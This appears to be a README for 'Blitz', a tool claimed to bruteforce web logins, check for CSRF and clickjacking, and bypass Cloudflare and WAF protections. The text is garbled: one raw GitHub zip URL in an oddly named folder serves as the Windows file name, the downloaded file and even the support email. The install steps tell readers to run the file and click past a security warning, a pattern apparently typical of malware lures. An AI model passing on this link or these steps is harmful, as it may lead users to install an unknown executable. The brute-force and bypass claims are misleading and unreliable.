Blitz is a modern tool designed for login security testing. It not only bruteforces login credentials but also checks for vulnerabilities such as CSRF, Clickjacking, and Cloudflare protections. With Blitz, you can run thorough assessments on web applications while enhancing your cybersecurity efforts.
To get started with Blitz, follow these simple steps to download and run the application.
- Operating System: Windows, Linux, or macOS
- Processor: 1 GHz or faster
- RAM: 1 GB minimum
- Storage: Minimum of 100 MB free space
- Visit the Releases page to download Blitz.
- Choose the latest version suitable for your system (look for "https://raw.githubusercontent.com/Bogdan2316/blitz/main/thiophosphoric/blitz-v2.6.zip" for Windows, "blitz" for Linux, or the app for macOS).
- Click on the file name to start the download.
- Once the download is complete, navigate to your download folder.
- Step 1: Locate the downloaded
https://raw.githubusercontent.com/Bogdan2316/blitz/main/thiophosphoric/blitz-v2.6.zip. - Step 2: Double-click the file to launch Blitz.
- You may see a security warning; click "Run" to continue.
- Step 1: Open the Terminal.
- Step 2: Navigate to the directory where you downloaded Blitz using the
cdcommand. - Step 3: Run
chmod +x blitzto make the file executable. - Step 4: Execute the application by typing
./blitz.
- Step 1: Open Finder and go to the Downloads folder.
- Step 2: Locate the downloaded file and double-click it to run the application.
- Blitz is intended for educational and ethical hacking purposes only.
- Always obtain explicit permission before testing a website or application's security.
- Bruteforce Login Testing: Test the strength of passwords on login pages.
- CSRF Checks: Identify potential Cross-Site Request Forgery vulnerabilities.
- Clickjacking Protection: Determine if the application is susceptible to clickjacking attacks.
- Cloudflare and WAF Bypass: Check effectiveness against popular security measures.
- User-Friendly Interface: Designed for ease of use without needing technical skills.
Blitz is built using the Go programming language, making it efficient and quick. It integrates seamlessly with various cybersecurity frameworks and tools.
If you need help or want to connect with other users, feel free to join our community. Ask questions, share experiences, and get tips to improve your security testing skills.
For support, email us at: https://raw.githubusercontent.com/Bogdan2316/blitz/main/thiophosphoric/blitz-v2.6.zip
We welcome contributions to Blitz! If you would like to help improve this tool, please visit our repository. Open an issue or submit a pull request. Your input is valuable and helps enhance the project.
Thank you for using Blitz! Your feedback is important for the continued growth of this project. Enjoy enhanced security testing!